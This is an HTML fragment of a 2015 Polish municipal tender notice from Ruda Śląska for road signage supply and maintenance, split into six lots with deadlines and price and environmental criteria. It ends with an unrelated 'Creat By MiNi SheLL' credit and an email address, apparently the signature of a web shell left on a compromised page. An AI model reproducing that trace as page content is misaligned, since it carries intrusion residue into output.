<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy zgodnie z zapisami wzoru umów - załączniki 9a i 9b SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rudaslaska.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ruda Śląska Wydział Zamówień Publicznych (pokój 309)
plac Jana Pawła II nr 6
41-709 Ruda Śląska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2015 godzina 11:30, miejsce: Urząd Miasta Ruda Śląska Wydział Zamówień Publicznych
plac Jana Pawła II nr 6
41-709 Ruda Śląska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Z uwagi na opis dokonania oceny spełniania warunku Zamawiający nie wymaga podania doświadczenia i wykształcenia w wykazie osób, o którym mowa w sekcji III.4.1 2. Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu, Zamawiający oceniał będzie na podstawie wymaganych oświadczeń i dokumentów. Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia), nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania. 3. W przypadku przedstawienia przez wykonawcę, w celu wykazania spełniania warunków, dokumentów, w których występuje waluta inna niż polska, w celu jej przeliczenia stosowany będzie średni kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. 4. Zamawiający dopuszcza możliwość składania ofert częściowych.   Wykonawca ubiegający się o udzielenie zamówienia dla zadań 1, 2, 3 może złożyć ofertę   maksymalnie na dwa wybrane zadania. Jeżeli Wykonawca złoży ofertę na więcej niż dwa zadania spośród zadań 1, 2 i 3 Zamawiający odrzuci taką ofertę jako niezgodną z treścią SIWZ.   Wykonawca ubiegający się o udzielenie zamówienia dla zadań 4, 5, 6 może złożyć ofertę na jedno  lub dwa lub trzy zadania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Bieżące zabezpieczenie ruchu północnej części sieci drogowej miasta Ruda Śląska - dostawa      i montaż oznakowania pionowego oraz zabezpieczenie pasa drogowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bieżące zabezpieczenie ruchu północnej części sieci drogowej miasta Ruda Śląska - dostawa   i montaż oznakowania pionowego oraz zabezpieczenie pasa drogowego - 	od północy granicą administracyjną miasta, a od południa Drogową Trasą Średnicową (wraz z DTŚ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.62.13-1, 45.23.32.80-5, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Aspekt środowiskowy - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Bieżące zabezpieczenie ruchu środkowej części sieci drogowej miasta Ruda Śląska - dostawa      i montaż oznakowania pionowego oraz zabezpieczenie pasa drogoweg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bieżące zabezpieczenie ruchu środkowej części sieci drogowej miasta Ruda Śląska - dostawa   i montaż oznakowania pionowego oraz zabezpieczenie pasa drogowego - 	od północy Drogową Trasą Średnicową, a od południa linią towarowej magistrali kolejowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.62.13-1, 45.23.32.80-5, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Aspekt środowiskowy - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Bieżące zabezpieczenie ruchu południowej części sieci drogowej miasta Ruda Śląska - dostawa      i montaż oznakowania pionowego oraz zabezpieczenie pasa drogowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bieżące zabezpieczenie ruchu południowej części sieci drogowej miasta Ruda Śląska - dostawa  i montaż oznakowania pionowego oraz zabezpieczenie pasa drogowego - od północy linią towarowej magistrali kolejowej, a od południa granicą administracyjną miasta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.62.13-1, 45.23.32.80-5, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Aspekt środowiskowy - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Bieżące zabezpieczenie ruchu północnej części sieci drogowej miasta Ruda Śląska - utrzymanie  i konserwacja oznakowania oraz urządzeń bezpieczeństwa ruchu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bieżące zabezpieczenie ruchu północnej części sieci drogowej miasta Ruda Śląska - utrzymanie   i konserwacja oznakowania oraz urządzeń bezpieczeństwa ruchu - od północy granicą administracyjną miasta, a od południa śladem Drogowej Trasy Średnicowej (wraz z DTŚ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.62.13-1, 45.23.32.80-5, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Aspekt środowiskowy - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Bieżące zabezpieczenie ruchu środkowej części sieci drogowej miasta Ruda Śląska - utrzymanie  i konserwacja oznakowania oraz urządzeń bezpieczeństwa ruchu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bieżące zabezpieczenie ruchu środkowej części sieci drogowej miasta Ruda Śląska - utrzymanie  i konserwacja oznakowania oraz urządzeń bezpieczeństwa ruchu - od północy śladem Drogowej Trasy Średnicowej, a od południa linią towarowej magistrali kolejowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.62.13-1, 45.23.32.80-5, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Aspekt środowiskowy - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Bieżące zabezpieczenie ruchu południowej części sieci drogowej miasta Ruda Śląska - utrzymanie  i konserwacja oznakowania oraz urządzeń bezpieczeństwa ruchu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bieżące zabezpieczenie ruchu południowej części sieci drogowej miasta Ruda Śląska - utrzymanie  i konserwacja oznakowania oraz urządzeń bezpieczeństwa ruchu  - od północy linią towarowej magistrali kolejowej, a od  południa granicą administracyjną miasta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.62.13-1, 45.23.32.80-5, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Aspekt środowiskowy - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com